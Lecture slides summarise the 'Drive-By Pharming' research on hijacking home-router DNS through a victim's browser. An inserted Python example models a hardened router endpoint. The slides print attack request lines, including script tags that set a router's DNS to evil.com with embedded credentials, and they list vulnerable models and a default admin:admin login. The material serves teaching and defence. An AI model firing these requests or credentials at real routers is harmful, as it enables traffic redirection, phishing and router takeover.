S. Stamm, Z. Ramzan, and M. Jakobsson Presented by Anh Le.

Post on 18-Dec-2015


DRIVE-BY PHARMING

S. Stamm, Z. Ramzan, and M. Jakobsson
Presented by Anh Le

Anh Le - UC Irvine - 2009

Authors

Sid Stamm - Indiana University - Google Intern

Dr. Zulfikar Ramzan - Technical Director of Symantec Security

Prof. Markus Jakobsson - Indiana University - Principal Scientist at Palo Alto RC

Outline

1. Introduction

2. Preliminaries and Previous Work

3. Drive-By Pharming

4. Demo

5. New Attacks and Recent Events

6. Conclusion and Discussion

1. Introduction

Motivation: total control of home broadband routers
○ Phishing (by changing the DNS setting)
○ Botnets (by changing the firmware)

How:
• Attacker sets up an "evil" webpage
• Victim visits the evil webpage
• Victim's home router is compromised
• No physical proximity required

Enablers:
• JavaScript-enabled web browsers
• Default password management of the routers

2a. Preliminaries

DNS: Domain Name System

[Figure: the client asks the DNS server (home router) "What's the IP of yahoo.com?" and receives the answer "yahoo.com's IP is 206.190.60.37"]

2a. Preliminaries (cont.)

Phishing: a type of social engineering attack to obtain access credentials

Pharming: an attack aiming to redirect a website's traffic to another, bogus website

2b. Previous Work

[Figure: a page loaded from the Internet probes the victim's internal network from inside the browser]

1. Internal Net Discovery [Kindermann 2003]
• Java Applet
• Detecting … "Your internal subnet is 10.0.0.0/24!"

2. Host Scanning [Grossman 2006, SPI Labs 2006]
• JavaScript
• Fingerprint router using default password and image name
• Detecting … "You have a Linksys router, and its IP is 10.0.0.1!"

3. Drive-By Pharming

[Figure: the victim's browser loads a page from the Internet; callout on the home router: "DNS Setting Changed!"]

3. Drive-By Pharming

How is it possible?

• HTTP GET configuration:
  http://10.0.0.1/apply.cgi?dns=new-dns-server.com

• Off-site script inclusion:
  <script src="http://10.0.0.1/apply.cgi?dns=evil.com"></script>

• How about password-protected?
  <script src="http://usr:pwd@10.0.0.1/apply.cgi?dns=evil.com"></script>

3. Drive-By Pharming (cont.)

Assumptions:
1. JavaScript-enabled web browser
2. Default password management

Vulnerable routers: Netgear WGR614, D-Link DI-524, Linksys WRT54G, Cisco 806, 826, …

[Pie chart: American web users: 47.5% JS + Password, 47.5% JS + Default Password, 5.0% No JS]
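The request shapes on the preceding slide (a state-changing GET, an off-site <script src> include, credentials embedded in the URL) and the two assumptions above spell out what a router's configuration endpoint has to refuse. The Python model below is an added example written for this transcript; it is not code from the paper, the presenter or any router vendor. The endpoint name apply.cgi and the dns parameter come from the slides, while the Request and RouterState classes, the header names, the factory-credential set and the sample requests are constructed assumptions. Each check removes one enabler: settings cannot be applied while the factory password is in place, a state change must be a POST (a script or image include can only issue GET), the Origin must be the router itself, and a single-use CSRF token issued to the admin session must be present.

```python
# Added example (not from the slides or the paper): a minimal model of a
# home-router "apply.cgi" handler hardened against drive-by pharming.
# RouterState, the Request shape and all sample requests are constructed.
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, Optional, Set, Tuple

ROUTER_HOST = "10.0.0.1"                      # LAN address used on the slides
FACTORY_CREDENTIALS = {("admin", "admin")}    # assumed factory default


@dataclass
class Request:
    """Only the parts of an HTTP request that the check needs."""
    method: str
    path: str
    headers: Dict[str, str] = field(default_factory=dict)
    params: Dict[str, str] = field(default_factory=dict)   # query string or form body
    auth: Optional[Tuple[str, str]] = None                 # (user, password) from Basic auth


@dataclass
class RouterState:
    admin_password: str = "admin"              # factory value until the owner changes it
    dns_server: str = "isp-resolver.example"   # constructed placeholder
    csrf_tokens: Set[str] = field(default_factory=set)

    def issue_csrf_token(self) -> str:
        """Token embedded in the settings form when the admin UI renders it."""
        token = secrets.token_hex(16)
        self.csrf_tokens.add(token)
        return token


def apply_dns_setting(state: RouterState, req: Request) -> Tuple[int, str]:
    """Return (HTTP status, reason). Each check defeats one enabler of the
    attack; if any one fails, the DNS setting is left untouched."""
    # Enabler 1: default password management. A usr:pwd@ URL only works when
    # the guess is right, so refuse to apply settings while the factory
    # password is still in place, even though it authenticates.
    if (req.auth is None or req.auth[0] != "admin"
            or not hmac.compare_digest(req.auth[1], state.admin_password)):
        return 401, "authentication required"
    if req.auth in FACTORY_CREDENTIALS:
        return 403, "factory password must be changed before settings can be applied"
    # Enabler 2: off-site script inclusion. <script src=...> can only issue
    # GET, so a state change has to be a POST.
    if req.method != "POST":
        return 405, "state change requires POST"
    # A page on evil.example cannot make the browser send the router's own
    # Origin; the legitimate settings form is served by the router itself.
    if req.headers.get("Origin") != f"http://{ROUTER_HOST}":
        return 403, "cross-site origin"
    # The attacker's page never saw the token the router issued to the admin.
    token = req.params.get("csrf_token", "")
    if token not in state.csrf_tokens:
        return 403, "missing or invalid CSRF token"
    state.csrf_tokens.discard(token)           # single use
    new_dns = req.params.get("dns", "")
    if not new_dns:
        return 400, "dns parameter missing"
    state.dns_server = new_dns
    return 200, "dns updated"


def demo() -> Tuple[Dict[str, Tuple[int, str]], str]:
    """Run the slides' request shape and a legitimate change through the check."""
    results: Dict[str, Tuple[int, str]] = {}
    state = RouterState()
    # Constructed: the GET that <script src="http://usr:pwd@10.0.0.1/apply.cgi?dns=evil.com">
    # on a page at evil.example would produce, guessing admin:admin.
    drive_by = Request("GET", "/apply.cgi",
                       headers={"Referer": "http://evil.example/"},
                       params={"dns": "evil.com"}, auth=("admin", "admin"))
    results["drive_by_default_pwd"] = apply_dns_setting(state, drive_by)
    # Same request after the owner changed the password and the guess still fits:
    # it now fails on the method, before any origin or token check.
    state.admin_password = "correct-horse-battery-staple"
    drive_by.auth = ("admin", "correct-horse-battery-staple")
    results["drive_by_right_pwd"] = apply_dns_setting(state, drive_by)
    # Legitimate change submitted from the router's own settings page.
    token = state.issue_csrf_token()
    legit = Request("POST", "/apply.cgi",
                    headers={"Origin": f"http://{ROUTER_HOST}"},
                    params={"dns": "192.0.2.53", "csrf_token": token},   # constructed resolver
                    auth=("admin", "correct-horse-battery-staple"))
    results["legit"] = apply_dns_setting(state, legit)
    return results, state.dns_server


if __name__ == "__main__":
    for name, outcome in demo()[0].items():
        print(f"{name}: {outcome}")
```

The checks are ordered so that the cheapest, most general ones run first; a real router would also want the same treatment on every other configuration endpoint, not just the DNS one, since the slides' technique applies to any setting reachable by GET.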

3. Drive-By Pharming (cont.)

Verizon MI424-WR [Modem + Router]: admin:admin

4. Demo

5. New Attacks and Recent Events

New Attacks:
• Growing Zombies/Botnets
○ By installing evil firmware
• Viral Spread
○ Router auto-recruits routers

Recent Events:
• Kaminsky DNS Vulnerability (July 2008)
○ Cache poisoning attacks on any nameserver!
• Router Botnets (March 2009!)

6. Conclusion and Discussion

Routers with default password management are easily compromised

Browsers as conduits of attacks to internal network

Army of router botnets
